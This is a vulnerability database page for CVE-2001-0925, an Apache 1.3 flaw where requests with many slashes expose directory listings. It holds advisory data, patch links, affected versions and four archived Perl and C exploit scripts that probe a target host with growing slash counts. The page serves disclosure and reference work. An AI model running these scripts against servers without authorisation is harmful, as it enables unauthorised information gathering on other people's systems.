CVE-2001-0925
CVSS5.0
发布时间 :2001-03-12 00:00:00
修订时间 :2008-09-05 16:25:15
NMCOES    

[原文]The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.


[CNNVD]Apache特制超长斜线路径导致目录信息泄露漏洞(CNNVD-200103-004)

        
        Apache是一款广泛使用的开放源代码WEB服务程序。
        Apache的实现上存在目录信息泄漏漏洞,远程攻击者可能利用此漏洞获取目录列表。
        在默认的配置中Apache允许mod_dir,mod_autoindex和mod_negotiation。攻击者可以向Apache server提供由多个斜线("/")组成的特制请求,导致上述这些模块异常,这样就可能转义错误页面,获得目录内容的列表。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0925
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0925
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-004
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6921.php
(VENDOR_ADVISORY)  XF  apache-slash-directory-listing(6921)
http://www.securityfocus.com/bid/2503
(VENDOR_ADVISORY)  BID  2503
http://www.securityfocus.com/archive/1/168497
(VENDOR_ADVISORY)  BUGTRAQ  20010312 FORW: [ANNOUNCE] Apache 1.3.19 Released
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-077.php3
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:077
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&start=2002-01-27&end=2002-02-02&mid=199857&threads=1
(UNKNOWN)  BUGTRAQ  20010726 Apache Artificially Long Slash Path Directory Listing Vulnerabili ty -- FILE READ ACCESS
http://www.securityfocus.com/archive/1/193081
(VENDOR_ADVISORY)  BUGTRAQ  20010624 Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
http://www.securityfocus.com/archive/1/178066
(UNKNOWN)  BUGTRAQ  20010419 OpenBSD 2.8patched Apache vuln!
http://www.linuxsecurity.com/advisories/other_advisory-1452.html
(UNKNOWN)  ENGARDE  ESA-20010620-02
http://www.debian.org/security/2001/dsa-067
(UNKNOWN)  DEBIAN  DSA-067
http://www.apacheweek.com/features/security-13
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-13

- 漏洞信息

Apache特制超长斜线路径导致目录信息泄露漏洞
中危 输入验证
2001-03-12 00:00:00 2006-08-31 00:00:00
远程  
        
        Apache是一款广泛使用的开放源代码WEB服务程序。
        Apache的实现上存在目录信息泄漏漏洞,远程攻击者可能利用此漏洞获取目录列表。
        在默认的配置中Apache允许mod_dir,mod_autoindex和mod_negotiation。攻击者可以向Apache server提供由多个斜线("/")组成的特制请求,导致上述这些模块异常,这样就可能转义错误页面,获得目录内容的列表。
        

- 公告与补丁

        厂商补丁:
        Apache Group
        ------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://httpd.apache.org/download.cgi

- 漏洞信息 (20692)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1) (EDBID:20692)
multiple remote
2001-06-13 Verified
0 rfp
N/A [点击下载]
source: http://www.securityfocus.com/bid/2503/info

Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.

A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.

This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. 

#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
#
##########################################################################

use libwhisker;
use Getopt::Std;

# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
# HTTP/1.1, proxy, and SSL support.  Plus, small other changes.

$|++;
my (%hin,%hout,%args);

print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
print "SecurityFocus BID 2503\n\n";
print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
print "Moved to libwhisker by rfp\n\n";

getopts("p:L:H:sP:R:h:",\%args);

if($args{h} eq ''){
 print 'Usage: ./apache3.pl <options>, where options:',"\n";
 print '-h host  host to scan (must be specified)',"\n";
 print '-p ##	 host port (default: 80)',"\n";
 print '-L ##	 low end/start of range (default: 1)',"\n";
 print '-H ##	 high end/end of range (default: 8192)',"\n";
 print '-P host	 HTTP proxy via host',"\n";
 print '-R ##	 HTTP proxy port (default: 80)',"\n";
 print '-s	 use SSL (can\'t be used with proxy)',"\n";
 exit 0;
}

$low =  $args{L} || 1;
$high = $args{H} || 8192;

&lw::http_init_request(\%hin);		# setup our request hash

$hin{'whisker'}->{'host'}= $args{h};

$hin{'whisker'}->{'port'}= $args{p} || 80;

if(defined $args{s}){
 	$hin{'whisker'}->{'ssl'} = 1; 

	if(defined $args{P}){
		print "SSL not currently compatible with proxy\n";
		exit 1; 
	}
}

if(defined $args{'P'}){
	$hin{'whisker'}->{'proxy_host'}=$args{P};
	$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
	print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
	print "port $hin{'whisker'}->{'proxy_port'}\n";
}


&lw::http_fixup_request(\%hin);		# fix any HTTP requirements

for($c=$low; $c<=$high; $c++){

	$hin{'whisker'}->{'uri'} = '/' x $c;

	if(&lw::http_do_request(\%hin,\%hout)){
		print "Error: $hout{'whisker'}->{'error'}\n";
		exit 1;
	} else {
		if($hout{'whisker'}->{'http_resp'} == 200 &&
			$hout{'whisker'}->{'data'}=~/index of/i){

			print "Found result using $c slashes.\n";
			exit 0;
		}
	}

	print "."; # for status
}

print "\nNot vulnerable (perhaps try a different range).\n";


		

- 漏洞信息 (20693)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2) (EDBID:20693)
multiple remote
2002-02-21 Verified
0 st0ic
N/A [点击下载]
source: http://www.securityfocus.com/bid/2503/info
 
Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.
 
A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.
 
This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. 

/*
Program: apacheslash.c
Original Date: 2-21-02
Version: 1.0
Platform: Linux (compiled on SuSE 7.3)
c0der: st0ic
site: www.fsix.net
e-mail: st0ic@blackcodemail.com

Revised:
	NONE thus far

Description: This program tests an Apache installation for the "Apache Artificially Long Slash Path 
Directory Listing Exploit."  See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 

Compile: gcc apacheslash.c -o apacheslash

Stuff: I know theres already 3 Perl scripts that test this bug out, but there execution time is horrible
so I was bored and decided to recode it in C for execution speed sake. On my box, I think it took
about 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program.
BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com
BID 2503 to find out whats vulnerable and whats not.

I also included the comments from apache2.pl exploit which was modified
by Siberian of sentry-labs.com. Read below for the details:

/*************************************************
#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# new modified code by Siberian (www.sentry-labs.com)
#
########################################################################################
#
# Note: This isn't the orginal exploit! This one was modified and partly rewritten. 
#
# Changes:
#
# - help added (more user firendly :-) )
# - messages added 
# - exploit is now able to be executed on WinNT or 2k.
# - uses perl version of BSD sockets (compatible to Windows)
# 
# Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
# of the code and made it esaier to use and cross platform compatible.
# The old verion used a esaier but not that compaible way of socket stream communication.  
# Any network code was replaced by cross platform compatible BSD sockets.
# (much better than any other stream method :-) )
# 
# Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
#
# Original comment and source is attached below.
#
########################################################################################
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */	/*
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
-----snip snip----
**************************************************/

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

char tmp[10240];
char output[10240];
char *get = "GET ";
char *slash = "/";
char *http = " HTTP/1.0\r\n";
char *end = "\r\n\r\n";
int c, x;
int port;
int low;
int max;
int sockfd;
int bytes_recieved;
int count;
char *addr;

struct sockaddr_in dest_addr;
struct hostent *he;

void usage(char *ptr)
{
	fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr);
	fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr);
	fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n\n");
	exit(1);
}


int main(int argc, char *argv[])
{
	printf("\n\t[       apacheslash.c     ]");
	printf("\n\t[      c0ded by st0ic     ]");
	printf("\n\t[         Fsix.Net        ]");
	printf("\n\t[ st0ic@happyhack.zzn.com ]\n\n");

	while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1)
	{
		switch(c)
		{
			case 'h':
			{
				addr = optarg;
				break;
			}
			case 'p':
			{
				port = atoi(optarg);
				break;
			}
			case 'l':
			{
				low = atoi(optarg);
				break;
			}
			case 'm':
			{
				max = atoi(optarg);
				break;
			}
			default:
				usage(argv[0]);
		}
	}

	if ( low > max || addr == NULL )
		usage(argv[0]);

	if ( (he = gethostbyname(addr)) == NULL)
	{
		perror("gethostbyname");
		exit(1);
	}

	dest_addr.sin_family = AF_INET;
	dest_addr.sin_addr = *( (struct in_addr *) he->h_addr);
	dest_addr.sin_port = htons(port);
	memset (&dest_addr.sin_zero, 0, 8);
	
	printf("\t\n....Working....\n");
	
	while (low <= max)
	{
		count = low;
		bzero(tmp, sizeof(tmp) );
		
		if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
		{
			perror("socket");
			break;
		}

		if (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1)
		{
			perror("connect");
			exit(1);
		}
		
		strcpy(tmp, get);
		
		/* copy the necessary slashes. */
        for(x = 0; x < count; x++)
			strcat(tmp, slash);
		
		strcat(tmp, http);
		strcat(tmp, end);
		
		send(sockfd, tmp, sizeof(tmp), 0);
		
		bytes_recieved = 1;
		while(bytes_recieved > 0)
		{
			bytes_recieved = recv(sockfd, output, sizeof(output), 0);
			if ( (strstr(output, "Index of") ) != NULL)
			{
				printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low);
				close(sockfd);
				exit(0);
			}
		}
		
		low++;
		close(sockfd);
	}
	
	printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n");
	
	return 0;
}
		

- 漏洞信息 (20694)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3) (EDBID:20694)
multiple remote
2001-06-13 Verified
0 farm9
N/A [点击下载]
source: http://www.securityfocus.com/bid/2503/info
  
Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.
  
A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.
  
This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19.

#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#

use IO::Socket;

$low  = $ARGV[3]; #Low number of slash characters to try
$hi   = $ARGV[2]; #High number of slash characters to try
$port = $ARGV[1]; #Port to try to connect to
$host = $ARGV[0]; #Host to try to connect to

# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different number
# of /.  Send me the numbers if you don't mind matt@farm9.com

while($low <= $hi)
{

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed";

  $url = "";
  $buffer = "";
  $end = "";

  $url = "GET ";
  $buffer = "/" x $low . " HTTP/1.0\r\n";
  $end = "\r\n\r\n";

  $url = $url . $buffer . $end;

  print $socket "$url";
  while(<$socket>)
  {
    if($_ =~ "Index of")
    {
      print "Found the magic number: $low\n";
      print "Now go do it by hand to to see it all\n";
      close($socket);
      exit;
    }
  }

  close($socket);
  $low++;
}
		

- 漏洞信息 (20695)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4) (EDBID:20695)
multiple remote
2001-06-13 Verified
0 farm9
N/A [点击下载]
source: http://www.securityfocus.com/bid/2503/info
   
Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.
   
A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.
   
This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19.

#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# new modified code by Siberian (www.sentry-labs.com)
#
########################################################################################
#
# Note: This isn't the orginal exploit! This one was modified and partly rewritten. 
#
# Changes:
#
# - help added (more user firendly :-) )
# - messages added 
# - exploit is now able to be executed on WinNT or 2k.
# - uses perl version of BSD sockets (compatible to Windows)
# 
# Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
# of the code and made it esaier to use and cross platform compatible.
# The old verion used a esaier but not that compaible way of socket stream communication.  
# Any network code was replaced by cross platform compatible BSD sockets.
# (much better than any other stream method :-) )
# 
# Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
#
# Original comment and source is attached below.
#
########################################################################################
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#
#use IO::Socket;
#
#$low  = $ARGV[3]; #Low number of slash characters to try
#$hi   = $ARGV[2]; #High number of slash characters to try
#$port = $ARGV[1]; #Port to try to connect to
#$host = $ARGV[0]; #Host to try to connect to
#
# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different number
# of /.  Send me the numbers if you don't mind matt@farm9.com
#
#while($low <= $hi)
#{
#
#$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed";
#
#  $url = "";
#  $buffer = "";
#  $end = "";
#
#  $url = "GET ";
#  $buffer = "/" x $low . " HTTP/1.0\r\n";
#  $end = "\r\n\r\n";
#
#  $url = $url . $buffer . $end;
#
#  print $socket "$url";
#  while(<$socket>)
#  {
#    if($_ =~ "Index of")
#    {
#      print "Found the magic number: $low\n";
#      print "Now go do it by hand to to see it all\n";
#      close($socket);
#      exit;
#    }
#  }
#
#  close($socket);
#  $low++;
#}


use Socket;

print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n";
print "original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "rewritten and fixed by Siberian (www.sentry-labs.com)\n\n";
$host = shift || 'localhost'; #Host to try to connect to
$port = shift || '80'; #Port to try to connect to
$hi   = shift || '100'; #High number of slash characters to try
$low  = shift || '0'; #Low number of slash characters to try
if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0')) {
print 'Usage: ./apache2.pl <host> <port> <HI> <Low>';
print "\nHi and low are the range for the number of \/ to try\n";
exit 0;
}

print "\ntarget: $host";
print "\nport: $port";
print "\nhi: $hi";
print "\nlow: $low\n\nStarting attack...\n\n";

# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different number
# of /.  Send me the numbers if you don't mind matt@farm9.com

$url = "";
$buffer = "";
$end = "";

#$port = (getservbyname($port, 'tcp') || die "No port!");

$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr) or die "Faild ...  SOCKADDR_IN!";

$proto = getprotobyname('tcp');

while($low <= $hi) {

socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKY, $paddr ) or die "connect: $!";;

$url = "GET ";
$buffer = "/" x  $low .  " HTTP/1.0\r\n";
$end = "\r\n\r\n";

$url = $url . $buffer . $end;

print ".";

 send(SOCKY,$url,0) or die "send: $!";;
 
 while((recv(SOCKY,$out,1,0)) && ($out ne "")) { 
    if($out eq "I") {
     recv(SOCKY,$out,1,0);
     if($out eq "n") {
      recv(SOCKY,$out,1,0);
      if($out eq "d") {
       recv(SOCKY,$out,1,0);
       if($out eq "e") {
        recv(SOCKY,$out,1,0);
        if($out eq "x") {
         recv(SOCKY,$out,1,0);
          if($out eq " ") {
           recv(SOCKY,$out,1,0);
           if($out eq "o") {
            recv(SOCKY,$out,1,0);
             if($out eq "f") {
           print "Found the magic number: $low\n";
           print "Now go do it by hand to to see it all\n";
           close(SOCKY);
           exit 0;
           }  
          }  
         }  
        }  
       }
      }  
     }  
    }
   }

  close(SOCKY);
  $low++;
}
print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";

		

- 漏洞信息

9698
Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
Remote / Network Access Misconfiguration
Loss of Confidentiality
Exploit Public

- 漏洞描述

Apache HTTP server contains a flaw that may lead to an unauthorized information disclosure.  The issue is triggered when a remote attacker sends a specially crafted request, consisting of a large amount of slash characters '/', to a default apache install. The default enabled mod_negotiation, mod_dir/mod_autoindex modules will disclose a directory listing of the root directory instead of the index.html, resulting in a loss of confidentiality.

- 时间线

2001-03-12 Unknow
2001-06-13 Unknow

- 解决方案

Upgrade to apache version 1.3.19 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Apache Artificially Long Slash Path Directory Listing Vulnerability
Input Validation Error 2503
Yes No
2001-03-13 12:00:00 2009-07-11 06:06:00
This vulnerablity was announced to Bugtraq by Dan Harkless <dan-bugtraq@dilvish.speed.net> on March 12, 2001, and was originally announced by Martin Kraemer <martin@apache.org> on March 12, 2001.

- 受影响的程序版本

Apache Software Foundation Apache 1.3.17
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenBSD OpenBSD 2.8
+ S.u.S.E. Linux 7.1
Apache Software Foundation Apache 1.3.17
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.14
+ EnGarde Secure Linux 1.0.1
- MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ SGI IRIX 6.5.11
+ SGI IRIX 6.5.10
+ SGI IRIX 6.5.9
+ SGI IRIX 6.5.8
+ SGI IRIX 6.5.7
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
Apache Software Foundation Apache 1.3.12
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ OpenBSD OpenBSD 2.8
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0
+ Sun Cobalt ManageRaQ v2 3599BD
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Apache Software Foundation Apache 1.3.9
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ Sun Solaris 8_x86
+ Sun Solaris 8_sparc
+ Sun SunOS 5.8 _x86
+ Sun SunOS 5.8
Apache Software Foundation Apache 1.3.4
+ BSDI BSD/OS 4.0
Apache Software Foundation Apache 1.3.3
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
Apache Software Foundation Apache 1.3.22
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
